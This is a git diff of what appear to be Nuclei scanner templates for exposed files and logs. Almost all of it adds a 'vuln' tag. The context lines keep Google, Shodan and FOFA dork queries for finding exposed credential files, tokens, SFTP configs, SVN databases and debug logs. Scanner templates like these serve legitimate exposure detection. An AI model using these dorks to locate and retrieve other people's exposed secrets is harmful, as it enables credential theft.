00acd9337fb..c22c4f9fb3c 100644 --- a/http/exposures/files/service-account-credentials.yaml +++ b/http/exposures/files/service-account-credentials.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 2 google-query: intitle:"index of" "service-Account-Credentials.json" - tags: privatekey,exposure,files + tags: privatekey,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/shellscripts.yaml b/http/exposures/files/shellscripts.yaml index c8599c49a20..c4902c082c4 100644 --- a/http/exposures/files/shellscripts.yaml +++ b/http/exposures/files/shellscripts.yaml @@ -7,7 +7,7 @@ info: description: This template checks exposure of bash scripts. metadata: max-request: 27 - tags: bash,exposure,files + tags: bash,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/snyk-ignore-file-disclosure.yaml b/http/exposures/files/snyk-ignore-file-disclosure.yaml index cd139fddcd1..aa0f3bc593b 100644 --- a/http/exposures/files/snyk-ignore-file-disclosure.yaml +++ b/http/exposures/files/snyk-ignore-file-disclosure.yaml @@ -8,7 +8,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/snyk-ignore-file-disclosure.json metadata: max-request: 1 - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/socks5-vpn-config.yaml b/http/exposures/files/socks5-vpn-config.yaml index 18c0001dee4..b15c37d51c2 100644 --- a/http/exposures/files/socks5-vpn-config.yaml +++ b/http/exposures/files/socks5-vpn-config.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: app="惠尔顿-e地通VPN" - tags: esocks5,exposure,misconfig,files,disclosure + tags: esocks5,exposure,misconfig,files,disclosure,vuln http: - method: GET diff --git a/http/exposures/files/styleci-yml-disclosure.yaml b/http/exposures/files/styleci-yml-disclosure.yaml index b18a3741f11..c6eedec70b8 100644 --- a/http/exposures/files/styleci-yml-disclosure.yaml +++ b/http/exposures/files/styleci-yml-disclosure.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: ".styleci.yml" - tags: config,exposure,devops,files + tags: config,exposure,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/svn-wc-db.yaml b/http/exposures/files/svn-wc-db.yaml index 4f6d031f01b..7c246bac574 100644 --- a/http/exposures/files/svn-wc-db.yaml +++ b/http/exposures/files/svn-wc-db.yaml @@ -17,7 +17,7 @@ info: vendor: apache product: subversion google-query: intitle:"index of" "wc.db" - tags: msf,exposure,svn,config,files + tags: msf,exposure,svn,config,files,vuln http: - method: GET diff --git a/http/exposures/files/symfony-properties-ini.yaml b/http/exposures/files/symfony-properties-ini.yaml index 6e9d9b6f8b8..af2215813b5 100644 --- a/http/exposures/files/symfony-properties-ini.yaml +++ b/http/exposures/files/symfony-properties-ini.yaml @@ -12,7 +12,7 @@ info: vendor: sensiolabs product: symfony google-query: intitle:"index of" "properties.ini" - tags: symfony,exposure,files + tags: symfony,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/symfony-security.yaml b/http/exposures/files/symfony-security.yaml index 8b89e1a36a7..ef358029e67 100644 --- a/http/exposures/files/symfony-security.yaml +++ b/http/exposures/files/symfony-security.yaml @@ -12,7 +12,7 @@ info: vendor: sensiolabs product: symfony google-query: intitle:"index of" "security.yml" - tags: symfony,devops,exposure,files + tags: symfony,devops,exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/thumbs-db-disclosure.yaml b/http/exposures/files/thumbs-db-disclosure.yaml index a52c8c99a3a..d7c9ccfdd9c 100644 --- a/http/exposures/files/thumbs-db-disclosure.yaml +++ b/http/exposures/files/thumbs-db-disclosure.yaml @@ -8,7 +8,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/thumbs-db-disclosure.json metadata: max-request: 1 - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/token-info-json.yaml b/http/exposures/files/token-info-json.yaml index 398d5f8797b..8c5f9bf9f67 100644 --- a/http/exposures/files/token-info-json.yaml +++ b/http/exposures/files/token-info-json.yaml @@ -12,7 +12,7 @@ info: vendor: sample_token_project product: sample_token google-query: intitle:"index of" "token_info.json" - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/token-json.yaml b/http/exposures/files/token-json.yaml index ec0481d314e..1a40bd7491c 100644 --- a/http/exposures/files/token-json.yaml +++ b/http/exposures/files/token-json.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 2 google-query: intitle:"index of" "token.json" - tags: exposure,cloud,google,devops,files + tags: exposure,cloud,google,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/travis-ci-disclosure.yaml b/http/exposures/files/travis-ci-disclosure.yaml index d73a6fd30b5..49c86e07cc7 100644 --- a/http/exposures/files/travis-ci-disclosure.yaml +++ b/http/exposures/files/travis-ci-disclosure.yaml @@ -16,7 +16,7 @@ info: verified: true max-request: 2 shodan-query: html:"travis.yml" - tags: exposure,file,config,tenable + tags: exposure,file,config,tenable,vuln http: - method: GET diff --git a/http/exposures/files/uwsgi-ini.yaml b/http/exposures/files/uwsgi-ini.yaml index 9148d4b2246..5dce58d530e 100644 --- a/http/exposures/files/uwsgi-ini.yaml +++ b/http/exposures/files/uwsgi-ini.yaml @@ -12,7 +12,7 @@ info: vendor: unbit product: uwsgi shodan-query: html:"uwsgi.ini" - tags: exposure,uwsgi,files + tags: exposure,uwsgi,files,vuln http: - method: GET diff --git a/http/exposures/files/vagrantfile-exposure.yaml b/http/exposures/files/vagrantfile-exposure.yaml index 51ea5182eba..26efec1348d 100644 --- a/http/exposures/files/vagrantfile-exposure.yaml +++ b/http/exposures/files/vagrantfile-exposure.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: html:"Vagrantfile" - tags: config,exposure,vagrant,oss,files + tags: config,exposure,vagrant,oss,files,vuln http: - method: GET diff --git a/http/exposures/files/vercel-config-file.yaml b/http/exposures/files/vercel-config-file.yaml index c4f675d9a40..b22706faa00 100644 --- a/http/exposures/files/vercel-config-file.yaml +++ b/http/exposures/files/vercel-config-file.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: html:"vercel.json" - tags: exposure,files,vercel + tags: exposure,files,vercel,vuln http: - method: GET diff --git a/http/exposures/files/viminfo-disclosure.yaml b/http/exposures/files/viminfo-disclosure.yaml index 07210b46c36..6863bc17590 100644 --- a/http/exposures/files/viminfo-disclosure.yaml +++ b/http/exposures/files/viminfo-disclosure.yaml @@ -16,7 +16,7 @@ info: vendor: vim product: vim shodan-query: html:"Viminfo" - tags: devops,exposure,viminfo,config + tags: devops,exposure,viminfo,config,vuln http: - method: GET diff --git a/http/exposures/files/vscode-launch.yaml b/http/exposures/files/vscode-launch.yaml index 8f893d8667b..b9f60bc48b3 100644 --- a/http/exposures/files/vscode-launch.yaml +++ b/http/exposures/files/vscode-launch.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"index" html:".vscode" - tags: vscode,files,debug,exposure + tags: vscode,files,debug,exposure,vuln http: - method: GET diff --git a/http/exposures/files/vscode-sftp.yaml b/http/exposures/files/vscode-sftp.yaml index e84c381e0ec..6b565f931cc 100644 --- a/http/exposures/files/vscode-sftp.yaml +++ b/http/exposures/files/vscode-sftp.yaml @@ -14,7 +14,7 @@ info: vendor: microsoft product: visual_studio_code shodan-query: html:"sftp.json" - tags: exposure,vscode,sftp,ssh,files + tags: exposure,vscode,sftp,ssh,files,vuln http: - method: GET diff --git a/http/exposures/files/webpack-mix-js.yaml b/http/exposures/files/webpack-mix-js.yaml index eaa46f1f7d9..aba97a92fea 100644 --- a/http/exposures/files/webpack-mix-js.yaml +++ b/http/exposures/files/webpack-mix-js.yaml @@ -12,7 +12,7 @@ info: vendor: webpack.js product: webpack shodan-query: html:"webpack.mix.js" - tags: config,exposure,devops,files + tags: config,exposure,devops,files,vuln http: - method: GET diff --git a/http/exposures/files/webpack-sourcemap-disclosure.yaml b/http/exposures/files/webpack-sourcemap-disclosure.yaml index d4ed5cb5713..2e68ea98ff9 100644 --- a/http/exposures/files/webpack-sourcemap-disclosure.yaml +++ b/http/exposures/files/webpack-sourcemap-disclosure.yaml @@ -6,7 +6,7 @@ info: severity: info metadata: max-request: 2 - tags: exposure,files + tags: exposure,files,vuln http: - method: GET diff --git a/http/exposures/files/wget-hsts-list-exposure.yaml b/http/exposures/files/wget-hsts-list-exposure.yaml index ec8d3f5f958..0adcc814799 100644 --- a/http/exposures/files/wget-hsts-list-exposure.yaml +++ b/http/exposures/files/wget-hsts-list-exposure.yaml @@ -8,7 +8,7 @@ info: verified: true max-request: 1 shodan-query: html:".wget-hsts" - tags: devops,exposure,wget,files + tags: devops,exposure,wget,files,vuln http: - method: GET diff --git a/http/exposures/files/wordpress-readme-file.yaml b/http/exposures/files/wordpress-readme-file.yaml index a39a04f5f5f..462d8937965 100644 --- a/http/exposures/files/wordpress-readme-file.yaml +++ b/http/exposures/files/wordpress-readme-file.yaml @@ -12,7 +12,7 @@ info: - cpe:"cpe:2.3:a:wordpress:wordpress" product: wordpress vendor: wordpress - tags: exposure,wordpress,wp,readme,files + tags: exposure,wordpress,wp,readme,files,vuln http: - method: GET diff --git a/http/exposures/files/wp-cli-exposure.yaml b/http/exposures/files/wp-cli-exposure.yaml index f5d15dccf05..ef8453cb538 100644 --- a/http/exposures/files/wp-cli-exposure.yaml +++ b/http/exposures/files/wp-cli-exposure.yaml @@ -12,7 +12,7 @@ info: vendor: wp-cli product: wp-cli shodan-query: html:"wp-cli.yml" - tags: config,exposure,wp-cli,files + tags: config,exposure,wp-cli,files,vuln http: - method: GET diff --git a/http/exposures/files/ws-ftp-ini.yaml b/http/exposures/files/ws-ftp-ini.yaml index 7d1ab29811b..81cafd36061 100644 --- a/http/exposures/files/ws-ftp-ini.yaml +++ b/http/exposures/files/ws-ftp-ini.yaml @@ -13,7 +13,7 @@ info: vendor: ipswitch product: ws_ftp google-query: intitle:"Index of" ws_ftp.ini - tags: exposure,ftp,files + tags: exposure,ftp,files,vuln http: - method: GET diff --git a/http/exposures/files/xampp-environment-variables.yaml b/http/exposures/files/xampp-environment-variables.yaml index ab56d5a4dd3..9eb1ccea9eb 100644 --- a/http/exposures/files/xampp-environment-variables.yaml +++ b/http/exposures/files/xampp-environment-variables.yaml @@ -7,7 +7,7 @@ info: description: printenv.pl file is exposed in XAMPP leaking environment variables. metadata: max-request: 1 - tags: exposure,xampp,files + tags: exposure,xampp,files,vuln http: - method: GET diff --git a/http/exposures/files/yarn-lock.yaml b/http/exposures/files/yarn-lock.yaml index 62083960d6c..43126863fb9 100644 --- a/http/exposures/files/yarn-lock.yaml +++ b/http/exposures/files/yarn-lock.yaml @@ -10,7 +10,7 @@ info: - https://classic.yarnpkg.com/lang/en/docs/yarn-lock/ metadata: max-request: 1 - tags: exposure,files,yarn + tags: exposure,files,yarn,vuln http: - method: GET diff --git a/http/exposures/logs/access-log-file.yaml b/http/exposures/logs/access-log-file.yaml index 7f438a1adb3..b8c4badc0c1 100644 --- a/http/exposures/logs/access-log-file.yaml +++ b/http/exposures/logs/access-log-file.yaml @@ -7,7 +7,7 @@ info: description: Log file was exposed. metadata: max-request: 4 - tags: logs,exposure + tags: logs,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/action-controller-exception.yaml b/http/exposures/logs/action-controller-exception.yaml index f14338756d1..d70cf571d15 100644 --- a/http/exposures/logs/action-controller-exception.yaml +++ b/http/exposures/logs/action-controller-exception.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: 'title="Action Controller: Exception caught"' - tags: error,debug,log + tags: error,debug,log,vuln http: - method: GET diff --git a/http/exposures/logs/badarg-log.yaml b/http/exposures/logs/badarg-log.yaml index 7bacee5279b..611f9031fcc 100644 --- a/http/exposures/logs/badarg-log.yaml +++ b/http/exposures/logs/badarg-log.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 github-query: filename:badarg.log - tags: exposure,badarg,log,debug + tags: exposure,badarg,log,debug,vuln http: - method: GET diff --git a/http/exposures/logs/clockwork-php-page.yaml b/http/exposures/logs/clockwork-php-page.yaml index f91f28f2629..2b7a2ebe56c 100644 --- a/http/exposures/logs/clockwork-php-page.yaml +++ b/http/exposures/logs/clockwork-php-page.yaml @@ -10,7 +10,7 @@ info: - https://twitter.com/damian_89_/status/1250721398747791360 metadata: max-request: 1 - tags: tech,clockwork,exposure + tags: tech,clockwork,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/darkstat-detect.yaml b/http/exposures/logs/darkstat-detect.yaml index d3968f97135..27ff403bddd 100644 --- a/http/exposures/logs/darkstat-detect.yaml +++ b/http/exposures/logs/darkstat-detect.yaml @@ -9,7 +9,7 @@ info: - https://unix4lyfe.org/darkstat/ metadata: max-request: 2 - tags: darkstat,logs,exposure + tags: darkstat,logs,exposure,discovery http: - method: GET diff --git a/http/exposures/logs/delphi-mvc-exception.yaml b/http/exposures/logs/delphi-mvc-exception.yaml index bda8c41d7ea..fbb6275e003 100644 --- a/http/exposures/logs/delphi-mvc-exception.yaml +++ b/http/exposures/logs/delphi-mvc-exception.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: html:"DMVCFramework Exception" - tags: error,dmvc,log,delphi + tags: error,dmvc,log,delphi,vuln http: - method: GET diff --git a/http/exposures/logs/development-logs.yaml b/http/exposures/logs/development-logs.yaml index 24f19f37fb6..95444dedf63 100644 --- a/http/exposures/logs/development-logs.yaml +++ b/http/exposures/logs/development-logs.yaml @@ -7,7 +7,7 @@ info: description: Development log file was exposed. metadata: max-request: 3 - tags: logs,exposure,rails + tags: logs,exposure,rails,vuln http: - method: GET diff --git a/http/exposures/logs/django-debug-exposure.yaml b/http/exposures/logs/django-debug-exposure.yaml index 21400fb817b..7522f77c4f2 100644 --- a/http/exposures/logs/django-debug-exposure.yaml +++ b/http/exposures/logs/django-debug-exposure.yaml @@ -9,7 +9,7 @@ info: - https://twitter.com/Alra3ees/status/1397660633928286208 metadata: max-request: 1 - tags: django,exposure + tags: django,exposure,vuln http: - method: POST diff --git a/http/exposures/logs/dozzle-container-logs.yaml b/http/exposures/logs/dozzle-container-logs.yaml index 29486ed1c39..7e939eaad96 100644 --- a/http/exposures/logs/dozzle-container-logs.yaml +++ b/http/exposures/logs/dozzle-container-logs.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Dozzle" - tags: exposure,logs,dozzle,docker + tags: exposure,logs,dozzle,docker,vuln http: - method: GET diff --git a/http/exposures/logs/elmah-log-file.yaml b/http/exposures/logs/elmah-log-file.yaml index 17242709a23..908382fa28b 100644 --- a/http/exposures/logs/elmah-log-file.yaml +++ b/http/exposures/logs/elmah-log-file.yaml @@ -12,7 +12,7 @@ info: metadata: verified: true max-request: 2 - tags: logs,elmah,exposure + tags: logs,elmah,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/error-logs.yaml b/http/exposures/logs/error-logs.yaml index 75383ecb218..430a1a81ff5 100644 --- a/http/exposures/logs/error-logs.yaml +++ b/http/exposures/logs/error-logs.yaml @@ -7,7 +7,7 @@ info: description: Error log files were exposed. metadata: max-request: 29 - tags: logs,exposure,error + tags: logs,exposure,error,vuln http: - method: GET diff --git a/http/exposures/logs/event-debug-server-status.yaml b/http/exposures/logs/event-debug-server-status.yaml index 4363f1e78e2..64de0f62ce1 100644 --- a/http/exposures/logs/event-debug-server-status.yaml +++ b/http/exposures/logs/event-debug-server-status.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"Event Debug Server" - tags: event,exposure,debug + tags: event,exposure,debug,vuln http: - method: GET diff --git a/http/exposures/logs/exposed-glances-api.yaml b/http/exposures/logs/exposed-glances-api.yaml index 213964d27a6..edca637f1a2 100644 --- a/http/exposures/logs/exposed-glances-api.yaml +++ b/http/exposures/logs/exposed-glances-api.yaml @@ -9,7 +9,7 @@ info: - https://nicolargo.github.io/glances/ metadata: max-request: 1 - tags: glances,exposure + tags: glances,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/expression-engine-exception.yaml b/http/exposures/logs/expression-engine-exception.yaml index 2419edb95aa..9d6e3c256e7 100644 --- a/http/exposures/logs/expression-engine-exception.yaml +++ b/http/exposures/logs/expression-engine-exception.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: body="Exception - ExpressionEngine" - tags: error,expressionengine,log + tags: error,expressionengine,log,vuln http: - method: GET diff --git a/http/exposures/logs/fastcgi-echo.yaml b/http/exposures/logs/fastcgi-echo.yaml index 2f9d2a4dd13..d5b61ed8cea 100644 --- a/http/exposures/logs/fastcgi-echo.yaml +++ b/http/exposures/logs/fastcgi-echo.yaml @@ -18,7 +18,7 @@ info: vendor: fastcgi product: fcgi google-query: inurl:fcgi-bin/echo - tags: exposure,logs,oracle,fastcgi,edb + tags: exposure,logs,oracle,fastcgi,edb,vuln http: - method: GET diff --git a/http/exposures/logs/ffserver-status.yaml b/http/exposures/logs/ffserver-status.yaml index b23d99ed7bd..cb8f4bffc3c 100644 --- a/http/exposures/logs/ffserver-status.yaml +++ b/http/exposures/logs/ffserver-status.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 1 shodan-query: title:"ffserver Status" - tags: exposure,exposures,logs,ffserver + tags: exposure,exposures,logs,ffserver,vuln http: - method: GET diff --git a/http/exposures/logs/firebase-debug-log.yaml b/http/exposures/logs/firebase-debug-log.yaml index 01cabec9dc6..8c884a85559 100644 --- a/http/exposures/logs/firebase-debug-log.yaml +++ b/http/exposures/logs/firebase-debug-log.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 1 github-query: filename:firebase-debug.log - tags: exposure,firebase,logs,debug + tags: exposure,firebase,logs,debug,vuln http: - method: GET diff --git a/http/exposures/logs/git-exposure.yaml b/http/exposures/logs/git-exposure.yaml index e0aef52a1be..4576f2828fd 100644 --- a/http/exposures/logs/git-exposure.yaml +++ b/http/exposures/logs/git-exposure.yaml @@ -8,7 +8,7 @@ info: metadata: verified: true max-request: 1 - tags: logs,git,exposure + tags: logs,git,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/git-logs-exposure.yaml b/http/exposures/logs/git-logs-exposure.yaml index d8e8d44d6bf..342a952027e 100644 --- a/http/exposures/logs/git-logs-exposure.yaml +++ b/http/exposures/logs/git-logs-exposure.yaml @@ -7,7 +7,7 @@ info: description: Searches Git Logs files and passed URLs. metadata: max-request: 1 - tags: logs,git,exposure + tags: logs,git,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/go-pprof-debug.yaml b/http/exposures/logs/go-pprof-debug.yaml index 95e4891cf7f..fed02f87c65 100644 --- a/http/exposures/logs/go-pprof-debug.yaml +++ b/http/exposures/logs/go-pprof-debug.yaml @@ -7,7 +7,7 @@ info: description: go pprof debug page was exposed. metadata: max-request: 2 - tags: logs,exposure,go,pprof + tags: logs,exposure,go,pprof,vuln http: - method: GET diff --git a/http/exposures/logs/idea-logs-exposure.yaml b/http/exposures/logs/idea-logs-exposure.yaml index 5c1afb701a8..39fa98db279 100644 --- a/http/exposures/logs/idea-logs-exposure.yaml +++ b/http/exposures/logs/idea-logs-exposure.yaml @@ -7,7 +7,7 @@ info: description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file metadata: max-request: 2 - tags: phpstorm,jetbrains,idea,exposure + tags: phpstorm,jetbrains,idea,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/jboss-seam-debug-page.yaml b/http/exposures/logs/jboss-seam-debug-page.yaml index 874ce3e5f4b..b0574ab7685 100644 --- a/http/exposures/logs/jboss-seam-debug-page.yaml +++ b/http/exposures/logs/jboss-seam-debug-page.yaml @@ -9,7 +9,7 @@ info: - https://github.com/jaeles-project/jaeles-signatures/blob/master/common/jboss-seam-debug-page.yaml metadata: max-request: 1 - tags: jboss,logs,exposure + tags: jboss,logs,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/laravel-log-file.yaml b/http/exposures/logs/laravel-log-file.yaml index 60c4d6a7e58..b849678407c 100644 --- a/http/exposures/logs/laravel-log-file.yaml +++ b/http/exposures/logs/laravel-log-file.yaml @@ -9,7 +9,7 @@ info: - https://laravel.com/docs/master/logging metadata: max-request: 1 - tags: laravel,logs,exposure + tags: laravel,logs,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/laravel-telescope.yaml b/http/exposures/logs/laravel-telescope.yaml index 41cca6c7151..2f52a4b2921 100644 --- a/http/exposures/logs/laravel-telescope.yaml +++ b/http/exposures/logs/laravel-telescope.yaml @@ -9,7 +9,7 @@ info: - https://laravel.com/docs/8.x/telescope metadata: max-request: 1 - tags: laravel,disclosure,logs,exposure + tags: laravel,disclosure,logs,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/lua-runtime-error.yaml b/http/exposures/logs/lua-runtime-error.yaml index e5379ffaf61..ac08f553e42 100644 --- a/http/exposures/logs/lua-runtime-error.yaml +++ b/http/exposures/logs/lua-runtime-error.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: 'title="Error 500: LUA Runtime Error"' - tags: error,lua,log + tags: error,lua,log,vuln http: - method: GET diff --git a/http/exposures/logs/lucee-stack-trace.yaml b/http/exposures/logs/lucee-stack-trace.yaml index 5e651e4c31d..31c7fdfb374 100644 --- a/http/exposures/logs/lucee-stack-trace.yaml +++ b/http/exposures/logs/lucee-stack-trace.yaml @@ -8,7 +8,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Lucee" - tags: lucee,exposure + tags: lucee,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/mako-runtime-error.yaml b/http/exposures/logs/mako-runtime-error.yaml index d38f559a4c0..a350b09050f 100644 --- a/http/exposures/logs/mako-runtime-error.yaml +++ b/http/exposures/logs/mako-runtime-error.yaml @@ -8,7 +8,7 @@ info: max-request: 1 vendor: twig fofa-query: title="Mako Runtime Error" - tags: error,mako,log + tags: error,mako,log,vuln http: - method: GET diff --git a/http/exposures/logs/microsoft-runtime-error.yaml b/http/exposures/logs/microsoft-runtime-error.yaml index 85703b30d7b..23c45868c39 100644 --- a/http/exposures/logs/microsoft-runtime-error.yaml +++ b/http/exposures/logs/microsoft-runtime-error.yaml @@ -8,7 +8,7 @@ info: max-request: 1 vendor: microsoft shodan-query: title:"Runtime Error" - tags: iis,error,microsoft,log + tags: iis,error,microsoft,log,vuln http: - method: GET diff --git a/http/exposures/logs/milesight-system-log.yaml b/http/exposures/logs/milesight-system-log.yaml index df1becdf016..44fecaa14fb 100644 --- a/http/exposures/logs/milesight-system-log.yaml +++ b/http/exposures/logs/milesight-system-log.yaml @@ -16,7 +16,7 @@ info: product: ur5x_firmware vendor: milesight fofa-query: body=rt_title - tags: milesight,log,exposure + tags: milesight,log,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/mongodb-exception-page.yaml b/http/exposures/logs/mongodb-exception-page.yaml index 85194d2ec9b..e43ce440e30 100644 --- a/http/exposures/logs/mongodb-exception-page.yaml +++ b/http/exposures/logs/mongodb-exception-page.yaml @@ -7,7 +7,7 @@ info: metadata: max-request: 1 fofa-query: html:"MongoDB Exception" - tags: error,mongodb,log + tags: error,mongodb,log,vuln http: - method: GET diff --git a/http/exposures/logs/nginx-shards.yaml b/http/exposures/logs/nginx-shards.yaml index edca60e4537..140f31616d3 100644 --- a/http/exposures/logs/nginx-shards.yaml +++ b/http/exposures/logs/nginx-shards.yaml @@ -10,7 +10,7 @@ info: metadata: max-request: 2 shodan-query: html:"Welcome to Nginx" - tags: exposure,shards,nginx + tags: exposure,shards,nginx,vuln http: - method: GET diff --git a/http/exposures/logs/npm-debug-log.yaml b/http/exposures/logs/npm-debug-log.yaml index bb8b30082ba..551ccafcab9 100644 --- a/http/exposures/logs/npm-debug-log.yaml +++ b/http/exposures/logs/npm-debug-log.yaml @@ -16,7 +16,7 @@ info: vendor: npmjs product: npm github-query: filename:npm-debug.log - tags: exposure,npm,logs,debug + tags: exposure,npm,logs,debug,vuln http: - method: GET diff --git a/http/exposures/logs/npm-log-file.yaml b/http/exposures/logs/npm-log-file.yaml index 99ba968f82d..d60161ef08f 100644 --- a/http/exposures/logs/npm-log-file.yaml +++ b/http/exposures/logs/npm-log-file.yaml @@ -15,7 +15,7 @@ info: vendor: npmjs product: npm shodan-query: html:"npm-debug.log" - tags: npm,logs,exposure + tags: npm,logs,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/opentsdb-status.yaml b/http/exposures/logs/opentsdb-status.yaml index 803b0d0b70b..8421488f73b 100644 --- a/http/exposures/logs/opentsdb-status.yaml +++ b/http/exposures/logs/opentsdb-status.yaml @@ -15,7 +15,7 @@ info: vendor: opentsdb product: opentsdb shodan-query: http.favicon.hash:407286339 - tags: opentsdb,exposure,logs + tags: opentsdb,exposure,logs,vuln http: - method: GET diff --git a/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml b/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml index b606ce0d535..23c1bd7458c 100644 --- a/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml +++ b/http/exposures/logs/oracle-ebs-sqllog-disclosure.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: oracle,ebs,logs,exposure + tags: oracle,ebs,logs,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/production-log.yaml b/http/exposures/logs/production-log.yaml index 3ce1b169a79..11eaf9cefda 100644 --- a/http/exposures/logs/production-log.yaml +++ b/http/exposures/logs/production-log.yaml @@ -9,7 +9,7 @@ info: verified: true max-request: 3 github-query: filename:production.log Connecting to database specified by database.yml - tags: exposure,files,logs + tags: exposure,files,logs,vuln http: - method: GET diff --git a/http/exposures/logs/production-logs.yaml b/http/exposures/logs/production-logs.yaml index bea62ed9461..3113a54c8d7 100644 --- a/http/exposures/logs/production-logs.yaml +++ b/http/exposures/logs/production-logs.yaml @@ -7,7 +7,7 @@ info: description: Production log file was exposed. metadata: max-request: 3 - tags: exposure,logs,rails + tags: exposure,logs,rails,vuln http: - method: GET diff --git a/http/exposures/logs/pyramid-debug-toolbar.yaml b/http/exposures/logs/pyramid-debug-toolbar.yaml index 1d078e89e28..44ff239974c 100644 --- a/http/exposures/logs/pyramid-debug-toolbar.yaml +++ b/http/exposures/logs/pyramid-debug-toolbar.yaml @@ -9,7 +9,7 @@ info: - https://github.com/Pylons/pyramid_debugtoolbar metadata: max-request: 1 - tags: pyramid,logs,exposure + tags: pyramid,logs,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/rails-debug-mode.yaml b/http/exposures/logs/rails-debug-mode.yaml index 5656de77889..88ec5620911 100644 --- a/http/exposures/logs/rails-debug-mode.yaml +++ b/http/exposures/logs/rails-debug-mode.yaml @@ -7,7 +7,7 @@ info: description: Rails debug mode is enabled. metadata: max-request: 1 - tags: debug,rails,exposure,intrusive + tags: debug,rails,exposure,intrusive,vuln http: - method: GET diff --git a/http/exposures/logs/redis-exception-error.yaml b/http/exposures/logs/redis-exception-error.yaml index 7466d9a91b7..856f5b9279b 100644 --- a/http/exposures/logs/redis-exception-error.yaml +++ b/http/exposures/logs/redis-exception-error.yaml @@ -15,7 +15,7 @@ info: vendor: redis product: redis shodan-query: html:"redis.exceptions.ConnectionError" - tags: exposure,redis,logs + tags: exposure,redis,logs,vuln http: - method: GET diff --git a/http/exposures/logs/redv-super-logs.yaml b/http/exposures/logs/redv-super-logs.yaml index b06a72d182a..fc952dae63c 100644 --- a/http/exposures/logs/redv-super-logs.yaml +++ b/http/exposures/logs/redv-super-logs.yaml @@ -11,7 +11,7 @@ info: metadata: verified: true max-request: 1 - tags: redv,log,disclosure,exposure + tags: redv,log,disclosure,exposure,vuln http: - method: GET diff --git a/http/exposures/logs/roundcube-log-disclosure.yaml b/http/exposures/logs/roundcube-log-disclosure.yaml index a12196d337d..98a26922cdd 100644 --- a/http/exposures/logs/roundcube-log-disclosure.yaml +++ b/http/exposures/logs/roundcube-log-disclosure.yaml @@ -9,7 +9,7 @@ info: - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/roundcube-log-disclosure.json metadata: max-request: 16 - tags: exposure,logs + tags: exposure,logs,vuln http: - method: GET diff --git a/http/exposures/logs/sap-logon-error-message.yaml b/http/exposures/logs/sap-logon-error-message.yaml index 5a25d1dfd8f..bd2647a03f3 100644 --- a/http/exposures/logs/sap-logon-error-message.yaml +++ b/http/exposures/logs/sap-logon-error-message.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"Logon Error Message" - tags: sap,logon,error,log + tags: sap,logon,error,log,vuln http: - raw: diff --git a/http/exposures/logs/squid-analysis-report-generator.yaml b/http/exposures/logs/squid-analysis-report-generator.yaml index 9ec27dee294..78dac7a216f 100644 --- a/http/exposures/logs/squid-analysis-report-generator.yaml +++ b/http/exposures/logs/squid-analysis-report-generator.yaml @@ -9,7 +9,7 @@ info: - https://sourceforge.net/projects/sarg/ metadata: max-request: 1 - tags: sarg,exposure,logs + tags: sarg,exposure,logs,vuln http: - method: GET diff --git a/http/exposures/logs/struts-debug-mode.yaml b/http/exposures/logs/struts-debug-mode.yaml index 9cdd0764d10..11105226410 100644 --- a/http/exposures/logs/struts-debug-mode.yaml +++ b/http/exposures/logs/struts-debug-mode.yaml @@ -7,7 +7,7 @@ info: description: Apache Struts debug mode is enabled. metadata: max-request: 1 - tags: logs,struts,apache,exposure,setup + tags: logs,struts,apache,exposure,setup,vuln http: - method: GET diff --git a/http/exposures/logs/struts-problem-report.yaml b/http/exposures/logs/struts-problem-report.yaml index 41258716a00..ba5ea6747d4 100644 --- a/http/exposures/logs/struts-problem-report.yaml +++ b/http/exposures/logs/struts-problem-report.yaml @@ -9,7 +9,7 @@ info: - 